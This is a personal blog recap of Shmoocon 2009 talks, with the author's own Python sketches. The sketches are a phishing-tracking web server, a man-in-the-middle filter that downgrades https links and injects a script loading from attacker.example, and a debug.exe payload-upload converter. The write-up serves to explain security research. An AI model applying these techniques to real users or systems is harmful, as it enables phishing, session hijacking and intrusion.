Shmoocon 2009 Day 2

I really shouldn’t have to wake up at 7:30 am on a Saturday and take the Metro into DC. Fortunately I thought the 10am talk was worth it.
Phishing Statistics and Intuitive Enumeration of Hosts and Roles
by Sean Palka
This talk is about a tool he created/uses in corporate engagements. But as with most things developed on company time, it’s not free to be released. The presentation is meant to give you ideas. And it does make me realize that this could be a fun side project if I can’t get money for Phishme and I can’t get ahold of Lunker.
The motivation for this tool is to justify to clients that phishing is a useful exercise. He also wanted the tool to gather reliable stats for reporting.
When phishing a company you may find that distribution lists are hit. You may find email forwarded from one user to another. Just as with a marketing campaign, web bugs, images, and unique identifiers in URLs are used to determine who is following a link. Most mail clients no longer load images by default, so that cuts down on the ability to tell that a message was read even though the link was not clicked. However, some companies may whitelist their own domain name, allowing images to load automatically.
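To make that concrete, here is a minimal sketch of the unique-identifier/web-bug idea, not his tool (which isn’t released): a per-recipient token in both the image URL and the link URL, logged server-side. The Flask routes, file names, and token scheme are my own assumptions.

```python
# Minimal sketch of per-recipient tracking with a web bug and a tagged link.
# This is my illustration of the idea, not the presenter's tool. Assumes
# Flask is installed and a 1x1 "pixel.gif" sits next to this script.
from datetime import datetime, timezone
import csv

from flask import Flask, request, send_file

app = Flask(__name__)

def log_hit(kind, token):
    # One row per hit. The token ties the hit back to the recipient the
    # email was sent to; the same token showing up from several addresses
    # hints at forwarding or a user hopping between machines.
    with open("hits.csv", "a", newline="") as f:
        csv.writer(f).writerow([
            datetime.now(timezone.utc).isoformat(), kind, token,
            request.remote_addr, request.headers.get("User-Agent", ""),
        ])

@app.route("/img/<token>.gif")      # web bug: fires only if images load
def web_bug(token):
    log_hit("opened", token)
    return send_file("pixel.gif", mimetype="image/gif")

@app.route("/login/<token>")        # tagged link: fires when the link is clicked
def landing(token):
    log_hit("clicked", token)
    return "<html><!-- phishing landing page goes here --></html>"

if __name__ == "__main__":
    app.run()
```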
A bad guy phishing doesn’t care who responds. He just wants the credentials. But whitehat phishing needs reports and attribution. You want to know who visited the site without providing the phished-for information. Your phishing site could just as easily have contained a browser exploit.
Tagging or using unique identifiers in URLs does not solve the problem of message forwarding, or of a single user logging in from multiple locations. Timing can suggest the person probably didn’t drive home, but that person could have used remote desktop. You just don’t know if the message was forwarded or if the user is going from computer to computer trying the URL.
An audience member pointed out that you could use images and the client cache to determine if the same computer visits more than once. (I’m not sure how that would work if a proxy is used).
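As I understood the comment, the trick would be to give the per-recipient image a long cache lifetime, so a browser that already has it cached never asks for it again; a second server-side hit for the same token would then imply a different (cache-cold) browser or machine. A sketch of that interpretation, reusing the hypothetical Flask example above:

```python
# Sketch of the audience member's cache idea as I understood it -- my own
# interpretation, not something demonstrated in the talk. Reuses the
# hypothetical Flask app and pixel.gif from the sketch above.
from flask import Flask, make_response, send_file

app = Flask(__name__)

@app.route("/img/<token>.gif")
def web_bug(token):
    resp = make_response(send_file("pixel.gif", mimetype="image/gif"))
    # A long max-age means a browser that has fetched this token's image
    # once should not request it again, so every hit the server does see
    # comes from a browser/machine without it cached. A shared proxy
    # cache would of course hide repeat machines behind a single fetch.
    resp.headers["Cache-Control"] = "private, max-age=31536000"
    return resp
```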
You may be able to determine “important” systems by the responses as well. If one computer has a higher than normal number of responses it might be a helpdesk or an admin checking out user reports. Obviously if NAT is involved, you need to do your phishing from the internal network.
Additionally you can determine social networks by seeing to whom the email is forwarded.
When an internal system is used for a phishing attack, the following are pros/cons:
– The firewall prevents external connections. Email may be forwarded externally and responses cannot get to your internal site.
– People may trust the internal IP and act differently.
– You don’t have to worry about your other security filtering getting in the way. This isn’t a test of your spam filter.
– You can build focused attacks on victims.
Whitehat phishing attacks where the website is external have little ability to get the client IP. He said he hasn’t had a lot of consistent success using PHP. This limits reporting capabilities when NAT is used.
I didn’t ask whether he customizes the target emails with the users’ names.
He doesn’t include training in the tool (as Phishme does) because the focus of his tool is pentesting, not security training. While this is understandable given his role at BAH, I think most people looking to do whitehat phishing are going to want to provide the immediate user feedback/training that has been proven to be effective.
Stranger in a Strange Land: Reflections on a Linux guy’s First Year at Microsoft
by Crispin Cowan
A lot of this talk I felt I’d seen before, either on the SDL blog or on Jeff Jones’ blog. It was basically slides pointing out the success of the Security Development Lifecycle at Microsoft. Security at Microsoft comes down to before the 2002 Bill Gates Memo and after. For those who don’t know, Microsoft shut down coding for a month and re-trained employees in secure coding practices. They then followed up and made sure people did it.
One of the big problems that isn’t going away is legacy. There are a lot of applications that rely on doing dangerous, stupid things that they have historically been allowed to do. There is only so much breakage you can do before people start to push back. (Side comment: it was a huge deal for Microsoft to disable IIS by default in a desktop operating system. Their application vendors expected it to be there.) It is hard to fix architecture issues without screwing old applications. The application base is the value in Windows.
One of the big problems is the massive dependence on local admin. UAC is the stick used to push vendors to write their applications so they don’t require local admin rights. It’s not UAC that sucks, it’s the crappy application that needs admin rights just to run.
88% of users participating in the feedback program leave UAC enabled.
Another metric they use is sessions that are UAC prompt free.
In Vista RTM, this was 50%.
With SP1, consumer desktops were at 65% and computers joined to a domain (work computers) were at 80%.
I assume this means the applications are getting improved to not need admin rights. It could mean people stopped using the crappy app.
Middling Everything with Middler
by Jay Beale
Obviously MITM is nothing new. What this project does is:

  1. Inject javascript into HTTP
  2. Store session ID
  3. Intercept logout requests (even if you think you’ve logged out, you haven’t)
  4. Replace https links with http links (your bank site that only uses HTTPS for login is now sending your credentials in clear text; see the sketch below)

The purpose of the tool is:

  • Inject javascript into every page
  • Inject temporary or permanent redirects
  • Take over website with Browser exploitation framework
  • Compromise user with metasploit

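I haven’t looked at Middler’s code, but here is a toy sketch of two of the steps above (JavaScript injection and https-to-http link rewriting) as a response-body filter. The hook URL and function names are made up; this is only an illustration of the technique, not Middler itself.

```python
# Toy illustration of JavaScript injection and https->http link rewriting
# in an intercepted HTTP response body. This is my own sketch of the
# technique, not Middler's code; the hook URL is made up.
import re

HOOK = '<script src="http://attacker.example/hook.js"></script>'

def middle_response(html):
    # Rewrite https:// links to http:// so the victim's follow-up requests
    # stay in cleartext where the man-in-the-middle can keep reading them.
    html = re.sub(r'href="https://', 'href="http://', html, flags=re.IGNORECASE)
    # Inject a script tag into every page (e.g. a BeEF-style hook).
    return html.replace("</body>", HOOK + "</body>", 1)

if __name__ == "__main__":
    page = '<html><body><a href="https://bank.example/login">Log in</a></body></html>'
    print(middle_response(page))
```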
Middler is available on the InGuardians website.
The Agreement
A group of friends set up a framework of rules to govern them as they attempt to 0wn each other’s computers. When no one else will set up a capture-the-flag exercise for you, you hack on each other.
http://www.jointheagreement.com/
The Fast-Track Suite
by David Kennedy
The Fast-Track suite will be available in BackTrack 4. Or check out the Fast-Track website.
All I seem to remember is “pop a box.” 😉
Very interesting point-and-click hacking. As I understand it, some Metasploit attacks only worked against specific old service packs; he has made the attacks more universal.
In pen testing, I believe people use Windows debug to convert uploaded hex into a binary. There is a built-in 64 KB limit. He automates a way to get around that by supplying a new debug utility (at least that is how I understood it).
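I haven’t seen how Fast-Track does it, but the classic trick it improves on looks roughly like this: convert the binary into a script of debug.exe commands and replay it on the target, which runs into exactly the size ceiling he mentioned. A generic sketch (my own, exe2bat-style, with a hypothetical file name):

```python
# Generic sketch of the classic debug.exe upload trick (exe2bat style), not
# Fast-Track's code: emit a script that, fed to "debug.exe < payload.txt" on
# the target, rebuilds the binary there. debug.exe can only write a file of
# roughly 64 KB, which is the limit Fast-Track works around.
def to_debug_script(path, out_name="payload.exe"):
    data = open(path, "rb").read()
    if len(data) > 0xFF00:
        raise ValueError("debug.exe can only rebuild files up to ~64 KB")
    lines = ["n " + out_name]
    # 'e' commands enter bytes at offsets inside debug's 64 KB data segment,
    # starting at the traditional 0x100.
    for off in range(0, len(data), 16):
        chunk = " ".join("%02x" % b for b in data[off:off + 16])
        lines.append("e %04x %s" % (0x100 + off, chunk))
    # Set BX:CX to the byte count, write the file, quit.
    lines += ["rbx", "0", "rcx", "%x" % len(data), "w", "q"]
    return "\r\n".join(lines) + "\r\n"

if __name__ == "__main__":
    print(to_debug_script("met_payload.bin"))  # hypothetical input file
```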
In the demos he’d run an exploit, upload a VNC server, and connect to it.
I didn’t get a chair during this talk so I don’t have a lot of notes.